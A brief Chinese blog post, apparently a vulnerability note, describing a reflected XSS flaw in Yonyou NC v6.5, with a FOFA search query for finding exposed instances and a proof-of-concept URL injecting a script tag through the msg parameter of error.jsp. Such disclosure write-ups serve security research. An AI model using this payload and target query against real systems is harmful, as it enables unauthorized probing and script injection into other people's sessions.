用友NC v6.5 反射型xss

漏洞描述

用友NC6.5版本存在反射型xss

漏洞复现

fofa语法:app="用友-UFIDA-NC"
访问页面:

POC:
/uapws/pages/error.jsp?msg=<script>alert(1)</script>

posted @   学安全的小白  阅读(156)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 微软正式发布.NET 10 Preview 1:开启下一代开发框架新篇章
· 没有源码,如何修改代码逻辑?
· NetPad:一个.NET开源、跨平台的C#编辑器
· PowerShell开发游戏 · 打蜜蜂
· 凌晨三点救火实录:Java内存泄漏的七个神坑,你至少踩过三个!
点击右上角即可分享
微信分享提示